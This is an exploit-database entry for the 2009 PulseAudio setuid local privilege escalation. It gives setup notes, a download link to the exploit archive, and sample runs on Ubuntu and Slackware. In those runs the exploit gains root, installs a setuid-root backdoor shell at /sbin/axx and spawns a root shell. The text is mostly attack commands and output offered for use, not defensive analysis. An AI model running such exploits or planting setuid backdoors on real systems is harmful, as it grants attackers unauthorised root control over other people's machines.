55 lines
No EOL
1.7 KiB
Text
55 lines
No EOL
1.7 KiB
Text
PulseAudio setuid Local Privilege Escalation Vulnerability
|
|
http://www.securityfocus.com/bid/35721
|
|
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and
|
|
Yorick Koster
|
|
--
|
|
|
|
Put files in /tmp/pulseaudio-exp (or change config.h). Must be on
|
|
same fs as the pulseaudio binary.
|
|
|
|
Goes faster if you already have a pulseaudio running ? :p
|
|
|
|
Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0
|
|
(x86)
|
|
|
|
Ubuntu:
|
|
------------------------------------
|
|
$ ./c.sh
|
|
$ ./pulseaudio-exp
|
|
Please wait.
|
|
[*] Seems we are uid = 0 and gid = 0
|
|
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
|
|
[*] chown root.root /sbin/axx
|
|
[*] chmod 4755 /sbin/axx
|
|
Try: /sbin/axx /bin/sh
|
|
$ /sbin/axx /bin/sh
|
|
# id
|
|
uid=0(root) gid=0(root)
|
|
groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(adm
|
|
in),122(sambashare)
|
|
# uname -a
|
|
Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12
|
|
UTC 2009 x86_64 GNU/Linux
|
|
------------------------------------
|
|
Slackware
|
|
------------------------------------
|
|
$ ./c.sh
|
|
$ ./pulseaudio-exp
|
|
Please wait.
|
|
[*] Seems we are uid = 0 and gid = 0
|
|
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
|
|
[*] chown root.root /sbin/axx
|
|
[*] chmod 4755 /sbin/axx
|
|
Try: /sbin/axx /bin/sh
|
|
$ /sbin/axx /bin/sh
|
|
sh-3.1# id
|
|
uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt)
|
|
sh-3.1# uname -a
|
|
Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008
|
|
i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz
|
|
GenuineIntel GNU/Linux
|
|
------------------------------------
|
|
|
|
download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz)
|
|
|
|
# milw0rm.com [2009-07-20] |